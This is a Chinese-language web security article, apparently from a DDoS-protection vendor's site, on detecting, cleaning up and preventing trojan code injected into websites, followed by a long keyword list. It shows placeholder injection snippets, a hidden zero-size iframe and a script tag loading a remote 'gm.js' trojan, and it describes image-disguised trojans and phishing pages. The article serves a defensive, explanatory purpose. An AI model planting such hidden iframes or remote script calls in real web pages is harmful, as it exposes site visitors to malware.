网站挂马检测与预防方法

发布日期:2017-9-11 加入收藏

当一个网站运营很长时间后,网站文件会非常多,手工查看网页文件代码非常困难,本文就如何利用一些安全检测工具软件来检测和清除网站木马方面进行探讨,使用本文提及的工具可以很轻松的检测网站是否被挂马。
   1.检测挂马页面
   2.对网站进行侦测
   3.对地址进行解码
   4.获取该网站相关内容
   5.常见的挂马代码
   (1)框架嵌入式网络挂马
   网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下:
   <iframe src= “xxx”width=0 height=0></iframe>
   解释:在打开插入该句代码的网页后,就也就打开了xxx页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。
   (2)Js调用型网页挂马
   js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个。js文件,然后利用js代码调用到挂马的网页。通常代码如下:
   <script language=javascript src=http://www.xxx.com/gm.js></script>
   http://www.xxx.com/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关的选项就可以了。
   (3)图片伪装挂马
   随着防毒技术的发展,黑手段也不停地更新,图片木马技术逃避杀毒监视的新技术,攻击者将类似: http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中,这些嵌入代码的图片都可以用工具生成,攻击者只需输入相关的选项就可以了。图片木马生成后,再利用代码调用执行,是比较新颖的一种挂马隐蔽方法,实例代码如:
   (4)网络钓鱼挂马(也称为伪装调用挂马)
   网络中最常见的欺骗手段,黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页,利用社会工程学欺骗方法,引诱点击,当用户打开一个看似正常的页面时,网页代码随之运行,隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信息,然后窃取个人隐私相关联。比如攻击者模仿腾讯公司设计了一个获取QQ币的页面,引诱输入QQ好和密码,等用户输入完提交后,就把这些信息发送到攻击者指定的地方。
   (5)伪装挂马
   高级欺骗,黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术,当用户访问木马页面时地址栏显示www.sina.com或者www.baidu.com等用户信任地址,其实却打开了被挂马的页面,从而实现欺骗。
   (二)清除网站中的恶意代码(挂马代码)
   1.确定挂马文件
   清除网站恶意代码首先需要知道哪些文件被挂马了,判断方法有三个,方法一就是通过直接查看代码,从中找出挂马代码;方法二是通过查看网站目录修改时间,通过时间进行判断;方法三使用本文提到的软件进行直接定位,通过监听找出恶意代码。
   2.清除恶意代码
   可以使用记事本打开代码文件从中清除恶意代码,在清除代码时一定要注意不要使用FrontPage的预览或者设计,否则会直接访问挂马网站,感染木马程序。建议使用记事本等文本编辑器。在清除恶意代码过程中,发现挂马者竟然对js文件也不放过
   恢复措施:
   1.整站被挂马,最快速的恢复方法是,除开数据库、上传目录之外,替换掉其他所有文件;
   2.仔细检查网站上传目录存放的文件,很多木马伪装成图片保存在上传目录,你直接把上传文件夹下载到本地,用缩略图的形式,查看是不是图片,如果不显示,则一律删除;
   3.数据库里面存在木马,则把数据库的木马代码清除!可以采用查找替换;
   4.如果网站源文件没有,则需要FTP下载网站文件,然后再DW里面,用替换清除的方式一个个清除,注意网站的木马数,如果被挂了很多不同的,必须多多检查!
   预防措施 :
   1、建议用户通过ftp来上传、维护网页,尽量不安装的上传程序。
   2、对上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
   这其中包括各种新闻发布、商城及论坛程序,只要可以上传文件的都要进行身份认证!
   3、程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
   4、到正规网站下载程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。
   5、要尽量保持程序是最新版本。
   6、不要在网页上加注后台管理程序登陆页面的链接。
   7、为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过ftp上传即可。
   8、要时常备份数据库等重要文件。
   9、日常要多维护,并注意空间中是否有来历不明的文件。记住:一分汗水,换一分安全!
   10、一旦发现被入侵,除非自己能识别出所有木马文件,否则要删除所有文件。
   11、定期对网站进行安全的检测。
   安全设置一个重要原则,【可写目录不可执行脚本,可执行脚本的目录不给写权限】,可根据程序具体情况设置。
   千万不要怕麻烦,勤备份,有备才能无患。

关键字:木马 黑客 安全

本文地址:http://www.wewash.cn/fangyu/2.html

本站内容均由ddos防御专家_cdn原创,转载请注明出处--网站挂马检测与预防方法

上一篇:没有资料
ddos攻击 防火墙 服务器 ddos 数据包 路由器 黑客 木马 网络设备 终端 IP地址 安全风险 DDoS缓解 攻击 黑客攻击 服务攻击 ddos防御 IP ISP ProtonMail 进行进攻 网络运营商 放大攻击 系统攻击 DNS 流量 域名系统 互联网 加密 获取字节 字节 解密数据 加密密钥 的连接 TCP 攻击思路 TACACS+ 权限问题 新木马 设置防火墙 Response Ping 常用设备 打开路由器 CC 服务器的 协议 TCP/IP 访问程序 DDoS设备 同步数据 同步攻击 DDoS攻击模式 阻止DDoS攻击 洪水攻击 摧毁系统 平台资源 数据资源 企业安全 网络 无线 锁屏 企业内部 360产品 采集数据 安全分析 360平台 数据库 产业协同 安全协同 黑色产业 网站瘫痪 漏洞 攻击IP 黑客组织 602GBps BBC 病毒 恶意程序 系统工程 主机安全 防御DDOS 设置参数 DDOS设置 网关数据 360 交换网络 高科技 计算机 保护用户 终端用户 用户密码 虚拟机 服务账号 账户密码 保护措施 黑客头痛 安全技术 Computer 网络攻击 解决方案 威胁研究 被黑 安全认证 网站安全 工程攻击 信息安全 恶意软件 威胁 暴力破解 软件的最新版本 重大威胁 防止DDoS DDoS控制 DDoS事件 DDoS威胁 DDoS破坏 入侵检测 DoS防范基础 DDoS的防范 缓存资源 网络服务 方法 交换机 遭受攻击 判断网站 网络带宽 安装防火墙 服务器打补丁 SNMP 抵御 主机路由 洪水攻击保护 攻击保护 SYN windows系统防御 抵御DoS 监视攻击 受害目标 发包程序 提供www服务 主机利用 DDoS联网 主机丧失网络通信能力 ARP请求 错误源 分布式攻击 攻击模式 网络过载 攻击方式